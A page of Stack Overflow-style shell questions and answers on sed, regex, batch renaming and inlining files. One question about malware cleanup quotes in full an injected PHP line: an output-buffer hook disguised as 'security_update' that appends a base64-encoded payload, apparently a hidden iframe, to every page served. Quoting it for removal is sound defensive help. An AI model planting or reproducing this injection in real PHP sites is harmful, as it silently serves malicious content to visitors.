deleting and replacing string inside .php file - regex

I am having some problems with loading a php file and then replacing his content with something else.
my code looks like this
$pattern="*random text*"
$rep=" "
$where=`ls *.php`
find -f $where -name "*.php" -exec sed -i 's/$pattern/$rep/g' {} \;
This wont load entire line of text. Also is there a limit of how many character can $pattern load?
Also is there a way to make this .sh file execute on every 15min for example?
i am using mac osX.
Thanks!

The syntax $var="value" is wrong. You need to say var="value".
If you just want to do something on files matching *.php, you are doing it in just a directory, so there is no need to use find. Just use for loop:
pattern="*random text*"
rep=" "
for file in *.php
do
sed -i "s/$pattern/$rep/g" "$file"
done
See the usage of sed "s/$var/.../g" instead of sed 's/$var/.../g'. The double quotes expand the variables within the expression; otherwise, you would be looking for a literal $var.
Note that sed -i alone does not work in OS X, so you probably have to say sed -i ''.
Example of replacement:
Given a file:
$ cat a
hello
<?php eval(1234567890) regular php code ?>
bye
Let's remove everything from within eval():
$ sed -r 's/(eval\()[^)]*/\1X/' a
hello
<?php eval(X) regular php code ?>
bye

Related

Replace a > with a " sed regular expression

I have lots of files that have lines that are in the following way:
#include "3rd-party/*lots folders*>
problem is that it ends with > instead of "
Is there a quick regex for sed to change that?
basically, if the line starts with #include "3rd-party, it should replace the last character to ".
Thanks in advance
You can use this:
sed -i '' '/^[[:blank:]]*#include "3rd-party/s/>$/"/' file
#include "3rd-party/*lots folders*"
Basically you can use:
sed '/^[[:space:]]*#include "3rd-party/s/>[[:space:]]*$/"/' file
Explanation:
/^[[:space:]]*#include/ is an address, a regular expression address. The subsequent command will apply to lines which start which optional space followed by an #include statement.
s/>[[:space:]]*$/"/ replaces > followed by optional space and the end of the line by a ".
Use the -i option if you want to change the file in place:
sed -i '/^[[:space:]]*#include/s/>[[:space:]]*$/"/' file
On a bunch of, let's say C files, use find and it's -exec option:
find . -name '*.c' -exec sed -i '/^[[:space:]]*#include/s/[[:space:]]*$/"/' {} \;
You can use sed for searching a pattern and doing an action on this line like
sed '/search_pattern/{action}' your_file
The action you want to do is replacing the last character in a line with >$ where > is your desired character and $ means that the searched character must be placed at the end of a line.
The action for doing this is the sedcommand s/// which work's like s/search_pattern/replace_pattern/.
This looks for your goal like:
sed '/#include "3rd-party/{s/>$/"/}' your_file
But since sed is a (s)tream (ed)itor you have to use sed's command flag -i to make your changes inline or pipe it with > to a new file.
Like this
sed -i '/#include "3rd-party/{s/>$/"/}' your_file
or like this
sed '/#include "3rd-party/{s/>$/"/}' your_file > new_file
Please let me know if this does your work.

Pass sed output to mv

I'm trying to batch rename text files according to a string they contain.
I used sed to isolate the pattern with \( and \) as I couldn't get this to work in grep.
sed -i '' 's/<title>\(.*\)<\/title>/&/g' *.txt | mv *.txt $sed.txt
(the text I want to use as filename is between html title tags)`
Where I wrote $sed would be the output of sed.
hope that's clear!
A simple loop in bash can accomplish this. If each file is valid HTML, meaning you have only one <title> tag in the file, you can rename them all this way:
for file in *.txt; do
mv "$file" `sed -n 's/<title>\([^<]*\)<\/title>/\1/p;' $file| sed -e 's/[ ][ ]*/_/g'`.txt
done
So, if you have files 1.txt, 2.txt and 3.txt, each with cat, dog and my hippo in their TITLE tags, you'll end up with cat.txt, dog.txt and my_hippo.txt after the above loop.
EDIT: quoted initial $file in case there are spaces in filenames; and added a second sed to convert any spaces in the <title> tag to _'s in resulting filenames. NOTE the whitespace inside the []'s in the second sed command is a literal space and tab character.
You can enclose expression in grave accent characters (`) to make it insert its output to the place you want. Try:
mv *.txt `sed -i '' 's/<title>\(.*\)<\/title>/&/g' *.txt`.txt
It is rather not flexible, but should work.
(I haven't used it in a while and cannot test it now, so I might be wrong).
Here is the command I would use:
for i in *.txt ; do
sed "s=<title>\(.*\)</title>=mv '$i' '\1'=e" $i
done
The sed substitution search for pattern in each one of your .txt files. For each file it creates string mv 'file_name' 'found_pattern'.
With the e command at the end of sed commands, this resulting string is directly executed in terminal, thus it renames your files.
Some hints:
Note the use of =s instead of /s as delimiters for sed substition: it's more readable as you already have /s in your pattern (you could use many other symbols if you don't like =). And in this way you don't have to escape the / in your pattern.
The e command for sed executes the created string.
(I'm speaking of this one below:
sed "s=<title>\(.*\)</title>=mv '$i' '\1'=e" $i
^
)
So use it with caution! I would recommand to first use the line without final e: it won't execute any mv command, but just print instead what would be executed if you were to add the e.
What I read from your question is:
you have a number of text (html) files in a directory
each file contains at least the tag <title> ... </title>
you want to extract the content (elements.text) and use it as filename
last you want to rename that file to the extracted filename
Is this correct?
So, then you need to loop through the files, e.g. with xargs or find
ls '*.txt' | xargs -i\{\} command "{}" ...
find -maxdepth 1 -type f -name '*.txt' -exec command "{}" ... \;
I always replace the xargs substitues by -i\{\} because the resulting command is compatible if I use it sometimes with find and its substitute {}.
Next the -maxdepth option will help find not to dive deeper in directory, if no subdir, you can leave it out.
command could be something very simple like echo "Testing File: {}" or a really small script if you use it with bash:
find . -name '*.txt' -exec bash -c 'CUR_FILE="{}"; echo "Working on: $CUR_FILE"; ls -l "$CUR_FILE";' \;
The big decision for your question is: how to get the text from title element.
A simple solution (suitable if opening and closing tag is on same textline) would be by grep
A more solid solution is to use a HTML Parser and navigate by DOM operation
The simple solution base on:
get the title line
remove the everything before and after title content
So do it together:
ls *.txt | xargs -i\{\} bash -c 'TITLE=$(egrep "<title>[^<]*</title>" "{}"); NEW_FNAME=$(echo "$TITLE" | sed -e "s#.*<title>\([^<]*\)</title>.*#\1#"); mv -v "{}" "$NEW_FNAME.txt"'
Same with usage of find:
find . -maxdepth 1 -type f -name '*.txt' -exec bash -c 'TITLE=$(egrep "<title>[^<]*</title>" "{}"); NEW_FNAME=$(echo "$TITLE" | sed -e "s#.*<title>\([^<]*\)</title>.*#\1#"); mv -v "{}" "$NEW_FNAME.txt"' \;
Hopefully it is what you expected.

bash script with simple regular expression

Consider the following bash script with a simple regular expression:
for f in "$FILES"
do
echo $f
sed -i '/HTTP|RT/d' $f
done
This script shall read every file in the directory specified by FILES and remove the lines with occurrences of 'http' or 'RT' However, it seems that the OR part of the regular expression is not working. That is if I just have sed -i '/HTTP/d' $f then it will remove all lines containing HTTP but I cannot get it to remove both HTTP and RT
What must I change in my regular expression so that lines with HTTP or RT are removed?
Thanks in advance!
Two ways of doing it (at least):
Having sed understand your regex:
sed -E -i '/HTTP|RT/d' $f
Specifying each token separately:
sed -i '/HTTP/d;/RT/d' $f
Before you do anything, run with the opposite, and PRINT what you plan to DELETE:
sed -n -e '/HTTP/p' -e '/RT/p' $f
Just to be sure you are deleting only what you want to delete before actually changing the files.
"It's not a question of whether you are paranoid or not, but whether you are paranoid ENOUGH."
Well, first of all, it will process all WORDS in the FILES variable.
If you want it to do all files in the FILES directory, then you need something like this:
for f in $( find $FILES -maxdepth 1 -type f )
do
echo $f
sed -i -e '/HTTP/d' -e '/RT/d' $f
done
You just need two "-e" options to sed.

How to delete lines while preserving certain characters via sed/perl?

I'm trying to do a mass search and replace on all .php files for the following string for malware cleanup:
<?php ob_start("security_update"); function security_update($buffer){return $buffer.base64_decode('PHNjcmlwdD5kb2N1bWVudC53cml0ZSgnPHN0eWxlPi52Yl9zdHlsZV9mb3J1bSB7ZmlsdGVyOiBhbHBoYShvcGFjaXR5PTApO29wYWNpdHk6IDAuMDt3aWR0aDogMjAwcHg7aGVpZ2h0OiAxNTBweDt9PC9zdHlsZT48ZGl2IGNsYXNzPSJ2Yl9zdHlsZV9mb3J1bSI+PGlmcmFtZSBoZWlnaHQ9IjE1MCIgd2lkdGg9IjIwMCIgc3JjPSJodHRwOi8vd3d3Lml3cy1sZWlwemlnLmRlL2NvbnRhY3RzLnBocCI+PC9pZnJhbWU+PC9kaXY+Jyk7PC9zY3JpcHQ+');}
I can delete the entire line via sed '/buffer.base64_decode/d' file.php. However, I still need the opening <?php
So what really needs to be done is a search and replace of buffer.base64_decode for <?php and my brain is all mashed potatoes after a long day in front of this evil computer.
Or maybe I've thought myself into a tiny box and am going about this all wrong?
Instead of deleting the line, you don't you simply change it? Here's how, using GNU sed:
sed -i '/buffer.base64_decode/c \<?php ' file.php
Now for all files in your working directory:
find . -type f -name "*.php" -exec sed -i '/buffer.base64_decode/c \<?php ' {} \;
perl -pe 's/<\?php ob_start\("security_update"\);.*?\?>//gsm; s/<\?php ob_start\("security_update"\);.*/<?php/g;' test.php

Using bash regexp to insert the contents of a file into another

I have a javascript file with a jquery function call:
$.getScript('/scripts/files/file.js');
I want to replace that line with the contents of the file at that path. This is the bash script I have so far:
cat public/scripts/old.js | sed -e "s/$\.getScript\('(.)+'\);/$(cat \1)/g" > public/scripts/new.js
However, my regular expression and remembering the path does not seem to be working correctly. I get cat: 1: No such file or directory
as it seems as if cat is being called on the number 1 (which should be the remembered portion of the regexp). How can I fix this?
Because you are using $() inside double quotes, the shell is parsing the cat \1, stripping the backslash and trying to run cat 1 to pass its output as part of the argument to sed. Sed has a command (r) for reading a file, but the filename must be literal, and cannot be the result of previous sed commands (at least in standard sed, perhaps some implementations provide that ability). sed is really the wrong tool for this. You could do an awk solution, but it will be fragile.
Here's a possible perl solution (warning: fragile):
perl -ne 'if( $_ =~ /\$\.getScript\('"'(.*)'"'\)/ )
{ system( "cat $1" ) } else {print}' public/scripts/old.js